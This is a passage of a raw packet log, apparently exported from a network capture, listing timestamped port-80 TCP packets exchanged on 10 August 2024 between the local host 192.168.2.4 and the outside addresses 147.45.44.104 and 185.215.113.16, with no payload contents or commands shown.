Aug 10, 2024 16:12:22.607724905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.607738018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.607748032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.607748032 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.607777119 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.608521938 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608540058 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608552933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608568907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608582973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608596087 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608608961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.608653069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.608664989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.608664989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.608664989 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.609538078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609551907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609565973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609580994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609592915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609595060 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.609615088 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609628916 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.609637022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.609637022 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.609802961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.610507011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610521078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610534906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610549927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610564947 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610578060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610590935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.610590935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.610590935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.610634089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.610635042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.611370087 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611385107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611402035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611407995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.611416101 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611429930 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611443996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.611445904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.611445904 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.611485958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.612333059 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612349033 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612361908 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612377882 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612390995 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612405062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612407923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.612407923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.612418890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.612442017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.612462044 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.613102913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.613115072 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.613125086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.613136053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.613152027 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.613190889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.650649071 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.650684118 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.650717974 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.650784016 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.650784016 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.650892973 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.650947094 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651021957 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651053905 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651063919 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651276112 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651459932 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651494026 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651541948 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651773930 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651809931 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651834011 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651856899 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.651937008 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.651971102 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652024031 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652312994 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652354956 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652393103 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652393103 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652693033 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652734995 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652766943 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652796984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652820110 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652825117 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652858973 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652889967 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652899027 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652920008 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652925968 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.652947903 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.652960062 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.653007984 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.653009892 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.653043032 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.653059006 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.653075933 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.653088093 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.653109074 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.653152943 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.654694080 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654727936 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654750109 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.654787064 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.654850960 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654895067 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654922962 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.654931068 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654946089 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.654964924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.654995918 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655020952 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655617952 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655661106 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655714035 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655787945 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655822992 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655855894 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655864954 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655877113 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655889988 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.655911922 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.655958891 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.656627893 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.656661987 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.656682014 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.656697989 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.656708002 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.656738997 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.656749964 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.656780005 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.656785965 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.656842947 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657394886 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657428980 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657438993 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657460928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657466888 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657506943 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657530069 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657562971 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657649040 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657689095 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.657701015 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.657732964 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.658294916 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.658335924 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.658338070 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.658374071 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.658379078 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.658410072 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.658411980 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.658443928 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.658454895 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.658487082 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659332037 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659364939 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659380913 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659404039 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659446001 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659446001 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659473896 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659477949 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659493923 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659511089 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.659514904 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.659558058 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660222054 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660254955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660295010 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660300016 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660336018 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660336971 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660370111 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660392046 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660540104 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660928011 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660960913 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.660985947 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.660993099 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661005020 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661026955 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661057949 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661081076 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661091089 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661111116 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661128044 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661134958 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661168098 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661730051 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661763906 CEST	80	49741	185.215.113.16	192.168.2.4
Aug 10, 2024 16:12:22.661787987 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.661802053 CEST	49741	80	192.168.2.4	185.215.113.16
Aug 10, 2024 16:12:22.665452957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665493965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665534973 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.665565014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.665594101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665627956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665648937 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.665759087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.665817022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665851116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.665869951 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.665889978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.666127920 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.666348934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.666546106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.666584969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.666637897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.666651964 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.666678905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.666903019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.666946888 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.667232037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.667340994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.667426109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.667458057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.667478085 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.667541027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.667612076 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.667665958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.668090105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.668283939 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.668318987 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.668337107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.668354988 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.668418884 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.668468952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.668515921 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.669177055 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.669209003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.669229984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.669253111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.669285059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.669318914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.669347048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.669363022 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.669867992 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670051098 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.670088053 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670128107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670176029 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.670211077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670258999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.670605898 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670670986 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.670809984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670844078 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.670864105 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.670932055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671161890 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671219110 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671508074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671562910 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671717882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671751976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671771049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671796083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671853065 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671885014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671905041 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671936989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.671937943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671982050 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.671987057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672038078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672077894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672079086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672079086 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672121048 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672132969 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672153950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672158003 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672187090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672218084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672219038 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672245026 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672257900 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672257900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672307014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672312975 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672343016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672374964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672384977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672384977 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672408104 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672430992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672462940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672509909 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672558069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672571898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672601938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672627926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672662020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672686100 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672694921 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672717094 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672728062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672745943 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672760010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672789097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672791958 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672828913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.672832966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672832966 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.672920942 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.674834013 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.674868107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.674902916 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.674923897 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.674952030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.674967051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.674982071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675029993 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:22.675543070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675554037 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675565004 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675576925 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675587893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675599098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:22.675611019 CEST	80	49740	147.45.44.104	192.168.2.4
